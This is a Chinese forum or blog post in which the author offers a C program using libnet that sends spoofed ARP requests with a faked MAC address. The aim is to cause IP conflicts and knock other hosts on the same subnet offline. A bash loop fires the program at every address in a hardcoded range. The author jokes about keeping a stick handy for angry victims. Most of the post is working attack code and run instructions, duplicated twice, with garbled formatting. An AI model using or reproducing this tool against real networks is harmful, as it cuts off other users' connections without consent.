最近看ARP
用ARP欺骗搞了个掉线程序
就是造成同一网段内的其他上网主机IP地址冲突 从而达到使其掉线的目的......
下面放源码 和 运行SHELL脚本
环境LINUX 需要libnet libpcap库支持
编译生成drop_line,和 drop.sh放到同一目录下
运行:
#sh drop.sh
一次不行的话 多运行几次
嘿嘿
/**/
/* drop_line.c
* 编译: #gcc -o drop_line drop_line.c -Wall -lnet -lpcap
* 运行: #./drop_line <dest IP addr>
*
* 注意事项:使用前一定要在寝室里独自一人,紧闭门窗,身边最好能配棍一把,以防受害者上门滋事 :P
*
*/
#include < stdio.h >
#include < stdlib.h >
#include < unistd.h >
#include < sys / time.h >
#include < sys / types.h >
#include < sys / socket.h >
#include < netinet / in .h >
#include < arpa / inet.h >
#include < libnet.h >
#include < pcap.h >
#ifndef ETH_ALEN
#define ETH_ALEN 6
#endif
#ifndef IP_ALEN
#define IP_ALEN 4
#endif
/**/ /********************************
static u_char eth_xmas[ETH_ALEN] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
static u_char eth_null[ETH_ALEN] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
*********************************/
static u_char eth_src[ETH_ALEN] = ... { 0x0, 0x18, 0xf3, 0x0, 0x53, 0x66 } ; /**/ /* 伪装了host mac 呵呵 */
static u_char eth_dst[ETH_ALEN] = ... { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff } ; /**/ /* broadcast */
static u_char ip_src[IP_ALEN];
static u_char ip_dst[IP_ALEN];
int main( int argc, char ** argv)
... {
libnet_t *libnet = NULL;
char error[LIBNET_ERRBUF_SIZE];
int c;
if (getuid() && geteuid()) ...{
fprintf(stderr, "must be run as root");
exit(1);
}
if (argc != 2) ...{
printf("usage: %s <dst IP addr> ", argv[0]);
}
// open libnet
libnet = libnet_init(LIBNET_LINK, "eth0", error);
if (libnet == NULL) ...{
fprintf(stderr, "libnet_init() failed: %s", error);
exit(EXIT_FAILURE);
}
// get dst ip address
u_int32_t src_ip;
src_ip = libnet_name2addr4(libnet, argv[1], LIBNET_RESOLVE);
memcpy(ip_src, (char *) &src_ip, IP_ALEN);
...{ /**//* 网关IP */
ip_dst[0] = 218; ip_dst[1] = 29; ip_dst[2] = 153; ip_dst[3] = 254;
} //218.29.153.254
/**//* // print IP & MAC address
printf("dst IP: %d.%d.%d.%d ", ip_dst[0], ip_dst[1], ip_dst[2],
ip_dst[3]);
printf("drop IP: %d.%d.%d.%d ", ip_src[0], ip_src[1], ip_src[2],
ip_src[3]);
printf(" ");
for (i = 0; i < ETH_ALEN - 1; i++) {
printf("%.2x:", (u_int8_t) eth_src[i]);
}
printf("%.2x", (u_int8_t) eth_src[ETH_ALEN - 1]);
printf(" ");
*/
static libnet_ptag_t arp = 0, eth = 0;
arp = libnet_build_arp(ARPHRD_ETHER,
ETHERTYPE_IP,
ETH_ALEN, IP_ALEN,
ARPOP_REQUEST,
eth_src, ip_src,
eth_dst, ip_dst, NULL, 0, libnet, 0);
if (arp == -1) ...{
fprintf(stderr, "Can't build ARP header: %s ",
libnet_geterror(libnet));
goto bad;
}
eth = libnet_build_ethernet(eth_dst, eth_src, ETHERTYPE_ARP, NULL, 0, libnet, eth); /**//* 构造物理帧头 */
if (eth == -1) ...{
fprintf(stderr, "Can't build ethernet header: %s ",
libnet_geterror(libnet));
goto bad;
}
c = libnet_write(libnet);
if (c == -1) ...{
fprintf(stderr, "Can't send ARP packet: %s ",
libnet_geterror(libnet));
goto bad;
}
libnet_destroy(libnet);
return 0;
bad:
libnet_destroy(libnet);
return -1;
}
* 编译: #gcc -o drop_line drop_line.c -Wall -lnet -lpcap
* 运行: #./drop_line <dest IP addr>
*
* 注意事项:使用前一定要在寝室里独自一人,紧闭门窗,身边最好能配棍一把,以防受害者上门滋事 :P
*
*/
#include < stdio.h >
#include < stdlib.h >
#include < unistd.h >
#include < sys / time.h >
#include < sys / types.h >
#include < sys / socket.h >
#include < netinet / in .h >
#include < arpa / inet.h >
#include < libnet.h >
#include < pcap.h >
#ifndef ETH_ALEN
#define ETH_ALEN 6
#endif
#ifndef IP_ALEN
#define IP_ALEN 4
#endif
/**/ /********************************
static u_char eth_xmas[ETH_ALEN] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
static u_char eth_null[ETH_ALEN] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
*********************************/
static u_char eth_src[ETH_ALEN] = ... { 0x0, 0x18, 0xf3, 0x0, 0x53, 0x66 } ; /**/ /* 伪装了host mac 呵呵 */
static u_char eth_dst[ETH_ALEN] = ... { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff } ; /**/ /* broadcast */
static u_char ip_src[IP_ALEN];
static u_char ip_dst[IP_ALEN];
int main( int argc, char ** argv)
... {
libnet_t *libnet = NULL;
char error[LIBNET_ERRBUF_SIZE];
int c;
if (getuid() && geteuid()) ...{
fprintf(stderr, "must be run as root");
exit(1);
}
if (argc != 2) ...{
printf("usage: %s <dst IP addr> ", argv[0]);
}
// open libnet
libnet = libnet_init(LIBNET_LINK, "eth0", error);
if (libnet == NULL) ...{
fprintf(stderr, "libnet_init() failed: %s", error);
exit(EXIT_FAILURE);
}
// get dst ip address
u_int32_t src_ip;
src_ip = libnet_name2addr4(libnet, argv[1], LIBNET_RESOLVE);
memcpy(ip_src, (char *) &src_ip, IP_ALEN);
...{ /**//* 网关IP */
ip_dst[0] = 218; ip_dst[1] = 29; ip_dst[2] = 153; ip_dst[3] = 254;
} //218.29.153.254
/**//* // print IP & MAC address
printf("dst IP: %d.%d.%d.%d ", ip_dst[0], ip_dst[1], ip_dst[2],
ip_dst[3]);
printf("drop IP: %d.%d.%d.%d ", ip_src[0], ip_src[1], ip_src[2],
ip_src[3]);
printf(" ");
for (i = 0; i < ETH_ALEN - 1; i++) {
printf("%.2x:", (u_int8_t) eth_src[i]);
}
printf("%.2x", (u_int8_t) eth_src[ETH_ALEN - 1]);
printf(" ");
*/
static libnet_ptag_t arp = 0, eth = 0;
arp = libnet_build_arp(ARPHRD_ETHER,
ETHERTYPE_IP,
ETH_ALEN, IP_ALEN,
ARPOP_REQUEST,
eth_src, ip_src,
eth_dst, ip_dst, NULL, 0, libnet, 0);
if (arp == -1) ...{
fprintf(stderr, "Can't build ARP header: %s ",
libnet_geterror(libnet));
goto bad;
}
eth = libnet_build_ethernet(eth_dst, eth_src, ETHERTYPE_ARP, NULL, 0, libnet, eth); /**//* 构造物理帧头 */
if (eth == -1) ...{
fprintf(stderr, "Can't build ethernet header: %s ",
libnet_geterror(libnet));
goto bad;
}
c = libnet_write(libnet);
if (c == -1) ...{
fprintf(stderr, "Can't send ARP packet: %s ",
libnet_geterror(libnet));
goto bad;
}
libnet_destroy(libnet);
return 0;
bad:
libnet_destroy(libnet);
return -1;
}
SHELL SCRIPT:
#
!/
bin
/
bash
target = 254
current = 1
while [ $current - le $target ]
do
. / drop_line 218.29 . 153 .$current #填成你的实际ip段
current = `expr $current + 1 `
done
echo
exit 0
target = 254
current = 1
while [ $current - le $target ]
do
. / drop_line 218.29 . 153 .$current #填成你的实际ip段
current = `expr $current + 1 `
done
echo
exit 0
发送的ARP包无法通过猫
只能在同一局域网内实现功能
回来再研究研究